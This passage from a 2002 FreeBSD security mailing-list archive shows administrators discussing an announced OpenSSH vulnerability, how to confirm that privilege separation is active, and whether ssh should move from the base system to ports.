sorts of features that are unique to ssh (and aren't even directly security related), and openssh is really the only mature, featureful, supported and free implementation out there, so when stuff like this comes up, we're really pretty helpless.... -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE9GCEcswXMWWtptckRAmlSAKDI/vFLFM6KauPR7B/sec1h1JYGTACeNpJJ 03JM05KMrhU1ft527IN2ddM= =0e9O -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1: 1:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from lucubration.notgod.com (node-216-136-154-51.networks.paypal.com [216.136.154.51]) by hub.freebsd.org (Postfix) with SMTP id C00F937B43B for ; Tue, 25 Jun 2002 00:58:39 -0700 (PDT) Received: (qmail 96509 invoked from network); 25 Jun 2002 07:58:58 -0000 Received: from unknown (HELO notgod.com) (64.168.159.218) by node-216-136-154-51.networks.paypal.com with SMTP; 25 Jun 2002 07:58:57 -0000 Message-ID: <3D182295.2070409@notgod.com> Date: Tue, 25 Jun 2002 00:58:13 -0700 From: Brian Nelson User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020606 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jan Lentfer Cc: freebsd-security@FreeBSD.ORG Subject: Re: How to check if "UsePrivilegeSeparation" works in OpenSSH? References: <1024987600.2078.10.camel@jan-linnb.lan> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Level: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Jan Lentfer wrote: > Hi all, > > i replaced the base OpenSSH with 3.3p from the ports typing: > > bash-2.05# make -DOPENSSH_OVERWRITE_BASE > bash-2.05# make -DOPENSSH_OVERWRITE_BASE install > > I then added "sshd_program=/usr/local/sbin/sshd" to /etc/rc.conf and > uncommented NO_OPENSSH=true and NO_OPENSSL=true in etc make.conf. Since you're overwriting the base, this might break things for you. > Finally I added "UsePrivilegeSeparation yes" to /etc/ssh/sshd_config and > SIGHUPed sshd. sshd -V no reports version 3.3. "hupping" the running daemon tells it to re-read the configuration (for most applications)... you need to kill the listening process and re-start it... the child processes shoudl remain, so you won't lose your connection (at least, this has been my experience in the past)... to 'test' telnet to port 22 on the box and see what the header tells you the version is :) sshd -V doesn't tell you the version of the running processes... :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1: 2:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from sasami.jurai.net (sasami.jurai.net [66.92.160.223]) by hub.freebsd.org (Postfix) with ESMTP id 49C5537B4B5 for ; Tue, 25 Jun 2002 00:59:48 -0700 (PDT) Received: from sasami.jurai.net (sasami.jurai.net [66.92.160.223]) by sasami.jurai.net (8.12.2/8.12.2) with ESMTP id g5P7xg2A075471; Tue, 25 Jun 2002 03:59:43 -0400 (EDT) (envelope-from winter@jurai.net) Date: Tue, 25 Jun 2002 03:59:42 -0400 (EDT) From: "Matthew N. Dodd" To: Darren Reed Cc: security@FreeBSD.ORG Subject: Re: Time to look put more resources into FreeSSH ? In-Reply-To: <200206250632.QAA02400@caligula.anu.edu.au> Message-ID: <20020625035702.F95270-100000@sasami.jurai.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 25 Jun 2002, Darren Reed wrote: > I think the subject raises the question well enough. > > What do others think about creating a little "bio-diversity" and > moving from OpenSSH to FreeSSH at some point in the future as the > "default" ssh installed ? If it moves the ssh utility out of the system so that the upgrade path is via ports rather than build/install world then I'm for it. Having OpenSSH in the source tree doesn't buy us anything over having it in ports and managing our local patches in the projects/ CVS hierarchy. I see no problem with having a set of 'default packages' installed by sysinstall. -- | Matthew N. Dodd | '78 Datsun 280Z | '75 Volvo 164E | FreeBSD/NetBSD | | winter@jurai.net | 2 x '84 Volvo 245DL | ix86,sparc,pmax | | http://www.jurai.net/~winter | For Great Justice! | ISO8802.5 4ever | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1: 4: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp01.web.de [194.45.170.210]) by hub.freebsd.org (Postfix) with ESMTP id 3481237B483 for ; Tue, 25 Jun 2002 00:59:04 -0700 (PDT) Received: from [217.82.32.109] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17MlE6-0007QW-00 for freebsd-security@FreeBSD.ORG; Tue, 25 Jun 2002 09:59:02 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id C20E22A0 for ; Tue, 25 Jun 2002 09:59:00 +0200 (CEST) Received: from jan-linnb.lan (jan-linnb.lan [192.168.0.25]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 8003629E for ; Tue, 25 Jun 2002 09:58:57 +0200 (CEST) Subject: Re: Workarounds for OpenSSH problems From: Jan Lentfer To: FreeBSD Security Maillinglist In-Reply-To: <957C6FD8-8804-11D6-919D-0030654D97EC@patpro.net> References: <957C6FD8-8804-11D6-919D-0030654D97EC@patpro.net> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 25 Jun 2002 09:58:01 +0200 Message-Id: <1024991881.2078.27.camel@jan-linnb.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Die, 2002-06-25 um 08.27 schrieb patpro: > On mardi, juin 25, 2002, at 08:02 , Andrew McNaughton wrote: > > > I've installed it. It griped and wouldn't start without `mkdir > > /var/empty`. Having added that it's running, but it hasn't griped about > > the lack of an 'sshd' user/group. I added them anyway. I don't see any > > sign of an sshd process running as anything other than root though. > > Compression is enabled when I connect, but I'm not sure that the privilege > > separation is actually working. > If you read the README.privsep in the source directory (found in /usr/ports/ > distfiles/openssh-3.3p1.tar.gz if you upgraded using ports) and follow the > instruction. [..] On the 2 machines I updated to ssh-portable sshd started without /var/empty being existing. It didn't complain and seemed to be working. But as far as I understand right now /var/empty is needed for chroot, right? So, maybe it is running but it's not running secure (coz not chrooted)? Regards, Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1: 6:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by hub.freebsd.org (Postfix) with ESMTP id 6B13837B435 for ; Tue, 25 Jun 2002 01:00:59 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g5P80v3x069672; Tue, 25 Jun 2002 20:00:57 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Tue, 25 Jun 2002 20:00:57 +1200 (NZST) From: Andrew McNaughton X-X-Sender: andrew@a2 To: patpro Cc: Jan Lentfer , Subject: Re: How to check if "UsePrivilegeSeparation" works in OpenSSH? In-Reply-To: Message-ID: <20020625195333.U69343-100000@a2> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 25 Jun 2002, patpro wrote: > On mardi, juin 25, 2002, at 08:46 , Jan Lentfer wrote: > > > Finally I added "UsePrivilegeSeparation yes" to /etc/ssh/sshd_config and > > SIGHUPed sshd. sshd -V no reports version 3.3. > > > > Am I set and done? Is there a way to check if Privilege Seperation > > really works ? > > > just log in (via ssh of course) and type : > > $ ps -aux | grep sshd | grep -v grep > > and make sure it gives something like this : > > root 178 0.0 1.3 2088 1180 ?? Is 4:40PM 0:00.20 /usr/local/sbin/ > sshd > root 61294 0.0 1.8 4868 1656 ?? I 8:21AM 0:00.05 sshd: patpro > [priv] (sshd) > patpro 61296 0.0 1.9 5000 1744 ?? S 8:21AM 0:00.14 sshd: patpro@ > ttyp0 (sshd) > > > first process : regular sshd daemon, > second : spawned root limited process, > third : active process with limited privileges. (spawned from the 2nd > process if I understand correctly) I don't see the [priv] bit on the second one. Can you confirm with lsof that the chroot has taken effect? Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1:12:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from c7.campus.utcluj.ro (c7.campus.utcluj.ro [193.226.6.226]) by hub.freebsd.org (Postfix) with SMTP id 3CCE637B704 for ; Tue, 25 Jun 2002 01:08:29 -0700 (PDT) Received: (qmail 30600 invoked by uid 1008); 25 Jun 2002 08:22:46 -0000 Date: Tue, 25 Jun 2002 11:22:46 +0300 From: veedee@c7.campus.utcluj.ro To: security@freebsd.org Subject: Re: Time to look put more resources into FreeSSH ? Message-ID: <20020625112246.A30267@c7.campus.utcluj.ro> References: <200206250632.QAA02400@caligula.anu.edu.au> <20020625004019.W5916-100000@walter> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020625004019.W5916-100000@walter>; from jason-fbsd-security@shalott.net on Tue, Jun 25, 2002 at 12:51:56AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jun 25, 2002 at 12:51:56AM -0700, Jason Stone wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > > What do others think about creating a little "bio-diversity" and > > moving from OpenSSH to FreeSSH at some point in the future as the > > "default" ssh installed ? > > I'm very much in favor of "biodiversity," but if you're talking about > FreSSH (fressh.org), then, as far as I'm aware, it's a) only v1, and b) > pretty dead. true. "FreSSH currently implements SSH protocol version 1.5..." (http://www.fressh.org/ main page). > Personally, I'm exploring the feasibility of non-ssh alternatives > (ssl-wrapped versions of telnet/rsh/etc, enterprise-wide ipsec and > telnet/rsh/etc, etc...). Does anyone have any other ideas along these > lines? i think i read some threads about that some months ago. you might want to search the archives first. > But yeah, definitely biodiversity. ssh has embraced and extended rsh to > the point where people depend on all sorts of features that are unique to > ssh (and aren't even directly security related), and openssh is really the > only mature, featureful, supported and free implementation out there, so > when stuff like this comes up, we're really pretty helpless.... Just wanna say that if you are NOT falling into the "commercial category", ssh.com's server might be a better alternative than openssh (less buggy). I've been using it for years. Their latest version is 3.2.0 (http://www.ssh.com/products/ssh/download.cfm). # uname -a sshd2: SSH Secure Shell 3.2.0 (non-commercial version) on i386-unknown-freebsd4.6 For the rest of you though, OpenSSH is all you got if you want v2. :/ veedee. > > > -Jason > > ----------------------------------------------------------------------- > I worry about my child and the Internet all the time, even though she's > too young to have logged on yet. Here's what I worry about. I worry > that 10 or 15 years from now, she will come to me and say "Daddy, where > were you when they took freedom of the press away from the Internet?" > -- Mike Godwin > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.6 (FreeBSD) > Comment: See https://private.idealab.com/public/jason/jason.gpg > > iD8DBQE9GCEcswXMWWtptckRAmlSAKDI/vFLFM6KauPR7B/sec1h1JYGTACeNpJJ > 03JM05KMrhU1ft527IN2ddM= > =0e9O > -----END PGP SIGNATURE----- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1:12:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 0A32837B764 for ; Tue, 25 Jun 2002 01:09:49 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id CAA14549; Tue, 25 Jun 2002 02:09:31 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020625020718.00d715a0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 25 Jun 2002 02:09:30 -0600 To: Brian Nelson , Jan Lentfer From: Brett Glass Subject: Re: How to check if "UsePrivilegeSeparation" works in OpenSSH? Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <3D182295.2070409@notgod.com> References: <1024987600.2078.10.camel@jan-linnb.lan> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org By the way, after getting openssh-portable working on one system, I built a package (with OPENSSH_OVERWRITE_BASE) and took the package to another machine. On the second machine, privilege separation wouldn't work when I installed the port (though the daemon did run). I suspect that there's an implicit dependency that's not being satisfied. Anyone know what it might be? --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1:15: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from lucubration.notgod.com (node-216-136-154-51.networks.paypal.com [216.136.154.51]) by hub.freebsd.org (Postfix) with SMTP id EA2F437B767 for ; Tue, 25 Jun 2002 01:09:52 -0700 (PDT) Received: (qmail 98629 invoked from network); 25 Jun 2002 08:10:12 -0000 Received: from unknown (HELO notgod.com) (64.168.159.218) by node-216-136-154-51.networks.paypal.com with SMTP; 25 Jun 2002 08:10:11 -0000 Message-ID: <3D182537.6090603@notgod.com> Date: Tue, 25 Jun 2002 01:09:27 -0700 From: Brian Nelson User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020606 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "Matthew N. Dodd" Cc: Darren Reed , security@FreeBSD.ORG Subject: Re: Time to look put more resources into FreeSSH ? References: <20020625035702.F95270-100000@sasami.jurai.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Level: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Matthew N. Dodd wrote: > If it moves the ssh utility out of the system so that the upgrade path > is > via ports rather than build/install world then I'm for it. echo "NO_OPENSSH=true" >> /etc/make.conf && \ rm /usr/sbin/sshd /usr/bin/ssh /usr/bin/ssh-* Vola, sshd is now package-based on your system. Ports are already there. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1:17: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by hub.freebsd.org (Postfix) with ESMTP id 0B6E537B792 for ; Tue, 25 Jun 2002 01:10:56 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g5P8AsrE070050; Tue, 25 Jun 2002 20:10:54 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Tue, 25 Jun 2002 20:10:54 +1200 (NZST) From: Andrew McNaughton X-X-Sender: andrew@a2 To: "Matthew N. Dodd" Cc: Darren Reed , Subject: Re: Time to look put more resources into FreeSSH ? In-Reply-To: <20020625035702.F95270-100000@sasami.jurai.net> Message-ID: <20020625200524.O69343-100000@a2> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 25 Jun 2002, Matthew N. Dodd wrote: > On Tue, 25 Jun 2002, Darren Reed wrote: > > > What do others think about creating a little "bio-diversity" and > > moving from OpenSSH to FreeSSH at some point in the future as the > > "default" ssh installed ? > > If it moves the ssh utility out of the system so that the upgrade path is > via ports rather than build/install world then I'm for it. > > Having OpenSSH in the source tree doesn't buy us anything over having it > in ports and managing our local patches in the projects/ CVS hierarchy. I agree with this. I set NO_OPENSSH and NO_OPENSSL in my /etc/make.conf and use ports. Apart from being able to upgrade independently of the system, I like having the /usr/local/etc/rc.d scripts on hand. Why doesn't FreeBSD make these scripts exist in a stand alone form for things that get installed with the system? Is there a philosophy behind it, or is it just historical? Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1:17: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by hub.freebsd.org (Postfix) with SMTP id 5A3CA37B827 for ; Tue, 25 Jun 2002 01:13:34 -0700 (PDT) Received: (qmail 2963 invoked by uid 0); 25 Jun 2002 08:13:32 -0000 Received: from pd950a5aa.dip.t-dialin.net (HELO gmx.net) (217.80.165.170) by mail.gmx.net (mp015-rz3) with SMTP; 25 Jun 2002 08:13:32 -0000 Message-ID: <3D182603.6000002@gmx.net> Date: Tue, 25 Jun 2002 10:12:51 +0200 From: Michael Nottebrock User-Agent: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 Followup-To: freebsd-chat@freebsd.org To: Jarkko Santala Cc: freebsd-security@FreeBSD.ORG Subject: Re: Hogwash References: <20020625085925.R12462-100000@trillian.santala.org> X-Enigmail-Version: 0.61.1.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="------------enig6D033E159E3AE20198747B8F" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following is an OpenPGP/MIME signed message created by Enigmail/Mozilla, following RFC 2440 and RFC 2015 --------------enig6D033E159E3AE20198747B8F Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Jarkko Santala wrote: > On Tue, 25 Jun 2002, Tony Landells wrote: > > >>jake@iki.fi said: >> >>>How do you figure this works for commercial companies that need secsh >>>connections for business critical needs up and running 24x7? >> >>A couple of possibilities that spring to mind are: >> >> 1. Buy the commercial version, and get commercial support. >> >> 2. Fund the OpenSSH development so they can put funded resources >> on to fixing problems (and hence can ignore distracting influences >> like actually making money to pay for food, or turning in assignments, >> or ...) > > > With the attitude OpenSSH team has? No commercial company will give money > to someone who says "turn it off if it doesn't work". Right, instead they all buy Microsoft. *scnr*, f'up2 set. Regards, -- Michael Nottebrock "The circumstance ends uglily in the cruel result." - Babelfish --------------enig6D033E159E3AE20198747B8F Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQE9GCYJXhc68WspdLARAgG3AJ4ml8P3HTS99HArRUjnETadbPFgrQCeMqjf h9hXh7yQUSjGT4/Ytabm+1Q= =EQk/ -----END PGP SIGNATURE----- --------------enig6D033E159E3AE20198747B8F-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1:18:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from lucubration.notgod.com (node-216-136-154-51.networks.paypal.com [216.136.154.51]) by hub.freebsd.org (Postfix) with SMTP id B0FD537B427 for ; Tue, 25 Jun 2002 01:12:49 -0700 (PDT) Received: (qmail 99184 invoked from network); 25 Jun 2002 08:13:09 -0000 Received: from unknown (HELO notgod.com) (64.168.159.218) by node-216-136-154-51.networks.paypal.com with SMTP; 25 Jun 2002 08:13:07 -0000 Message-ID: <3D1825E7.4030201@notgod.com> Date: Tue, 25 Jun 2002 01:12:23 -0700 From: Brian Nelson User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020606 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Alfred Perlstein Cc: Theo de Raadt , FreeBSD Security Subject: Re: ENOUGH!!! Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulner ability (fwd) References: <20020625074744.GK53232@elvis.mu.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Level: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Alfred Perlstein wrote: > *sigh* > > People don't get that what Theo is doing is very fair. > > He's giving everyone a chance to protect themselves, the only people > that are getting screwed are those that are too damn lazy to adapt > the 'priv' stuff to their OS. > > Quit your whining and submit patches to update your favorite version > of FreeBSD already! > > thanks, > -Alfred I think I personally don't disagree with Theo, but I am confused about the state of Privelage Seperation for people not running (Open|NET)BSD... So it's a hard pill to swallow when the software is "a few days old". I am much more comfortable with a patched version coming from my vendor (in this case the FreeBSD core team) and firewalling my box until that is available.... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1:19:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from boleskine.patpro.net (boleskine.patpro.net [62.4.20.155]) by hub.freebsd.org (Postfix) with ESMTP id 8104B37B889 for ; Tue, 25 Jun 2002 01:14:28 -0700 (PDT) Received: from localhost (cassandre [192.168.0.1]) by boleskine.patpro.net (8.11.3/8.11.3) with ESMTP id g5P8EVY46166 for ; Tue, 25 Jun 2002 10:14:31 +0200 (CEST) (envelope-from patpro@patpro.net) Date: Tue, 25 Jun 2002 10:14:25 +0200 Subject: Re: How to check if "UsePrivilegeSeparation" works in OpenSSH? Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v482) From: patpro To: Content-Transfer-Encoding: 7bit In-Reply-To: <20020625195333.U69343-100000@a2> Message-Id: <902312FB-8813-11D6-919D-0030654D97EC@patpro.net> X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On mardi, juin 25, 2002, at 10:00 , Andrew McNaughton wrote: >> and make sure it gives something like this : >> >> root 178 0.0 Is 4:40PM 0:00.20 /usr/local/sbin/sshd >> root 61294 0.0 I 8:21AM 0:00.05 sshd: patpro [priv] (sshd) >> patpro 61296 0.0 S 8:21AM 0:00.14 sshd: patpro@ ttyp0 (sshd) > > I don't see the [priv] bit on the second one. > > Can you confirm with lsof that the chroot has taken effect? well in fact no, nothing about /var/empty in lsof patpro To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1:26:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from c18070.belrs1.nsw.optusnet.com.au (c18070.belrs1.nsw.optusnet.com.au [210.49.78.171]) by hub.freebsd.org (Postfix) with SMTP id A332437B401 for ; Tue, 25 Jun 2002 01:25:56 -0700 (PDT) Received: (qmail 18964 invoked from network); 25 Jun 2002 08:25:32 -0000 Received: from unknown (HELO optusnet.com.au) (unknown) by unknown with SMTP; 25 Jun 2002 08:25:32 -0000 Message-ID: <3D182912.2060306@optusnet.com.au> Date: Tue, 25 Jun 2002 18:25:54 +1000 From: Antony Mawer User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.1a) Gecko/20020613 X-Accept-Language: en-au, en-us, en MIME-Version: 1.0 To: "Matthew N. Dodd" Cc: Darren Reed , security@FreeBSD.ORG Subject: Re: Time to look put more resources into FreeSSH ? References: <20020625035702.F95270-100000@sasami.jurai.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Matthew N. Dodd wrote: > I see no problem with having a set of 'default packages' installed by > sysinstall. A very valid point. It also means that it's far easier to build a stripped-down system. Ideally, it'd be nice to have a minimal base system with just the essentials and package management tools, and then have an assortment of packages that can be installed. Then, as part of the install, things like OpenSSH, Perl are selected to be installed by default, but can be de-selected for a "lean" install. The only downside I can see to this is that it requires "more" to keep a system up-to-date than a make world/mergemaster; however, I'd imagine it then makes updating software a lot easier than having to merge the code into the base system like we presently have. The more modular, the better. -Antony To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1:41:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 5055237B403 for ; Tue, 25 Jun 2002 01:41:52 -0700 (PDT) Received: from sheldonh by axl.seasidesoftware.co.za with local (Exim 3.36 #1) id 17MluO-000JAx-00; Tue, 25 Jun 2002 10:42:44 +0200 Date: Tue, 25 Jun 2002 10:42:44 +0200 From: Sheldon Hearn To: Mike Silbersack Cc: freebsd-security@FreeBSD.ORG Subject: Re: Hogwash Message-ID: <20020625084244.GC73283@starjuice.net> Mail-Followup-To: Mike Silbersack , freebsd-security@FreeBSD.ORG References: <20020625041946.GA6840@edgemaster.zombie.org> <20020624233910.V55382-100000@patrocles.silby.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020624233910.V55382-100000@patrocles.silby.com> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On (2002/06/24 23:45), Mike Silbersack wrote: > I think this thread needs to die very soon. Theo's solution to this bug > is unorthodox, but it should serve to protect those who are willing to > upgrade. He does not deserve all the bashing you're giving him. Thank you, Mike. :-) It seems to me that a number of people have chosen to use this situation as an opportunity for some Theo-bashing. Very poor show, I think. The facts are: 1) Theo has warned that the details of a vulnerability will be published this coming Monday. This disclosure will constitute full disclosure. 2) This disclosure will open a race between the blackhats and administrators. 3) Theo's warning offers two ways for administrators to avoid the race: change your software or disable the software until disclosure. The disclosure of these avoidance methods does not assist the blackhats. Personally, I don't think adminsitrators could ask for more. I'm _very_ glad that the OpenSSH team hasn't told anyone else about a hole I can't patch against yet. I'm equally glad that, until the hole and patch are disclosed, there's a way for me to cover the hole up. Those of you who thought "Theo is well-hated, nobody will look down on me for pissing on him", you were wrong. You just ended up looking stupid. Shame on you! Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1:43:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from sasami.jurai.net (sasami.jurai.net [66.92.160.223]) by hub.freebsd.org (Postfix) with ESMTP id EA7B637B404 for ; Tue, 25 Jun 2002 01:43:41 -0700 (PDT) Received: from sasami.jurai.net (sasami.jurai.net [66.92.160.223]) by sasami.jurai.net (8.12.2/8.12.2) with ESMTP id g5P8hc2A021397; Tue, 25 Jun 2002 04:43:38 -0400 (EDT) (envelope-from winter@jurai.net) Date: Tue, 25 Jun 2002 04:43:38 -0400 (EDT) From: "Matthew N. Dodd" To: Antony Mawer Cc: Darren Reed , Subject: Re: Time to look put more resources into FreeSSH ? In-Reply-To: <3D182912.2060306@optusnet.com.au> Message-ID: <20020625044231.C95270-100000@sasami.jurai.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 25 Jun 2002, Antony Mawer wrote: > The only downside I can see to this is that it requires "more" to keep a > system up-to-date than a make world/mergemaster; however, I'd imagine it > then makes updating software a lot easier than having to merge the code > into the base system like we presently have. The work required to update the SSH sources in the tree insures that it will always be updated as infrequently as possible. This alone is reason to move it to ports and leave it there. -- | Matthew N. Dodd | '78 Datsun 280Z | '75 Volvo 164E | FreeBSD/NetBSD | | winter@jurai.net | 2 x '84 Volvo 245DL | ix86,sparc,pmax | | http://www.jurai.net/~winter | For Great Justice! | ISO8802.5 4ever | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the 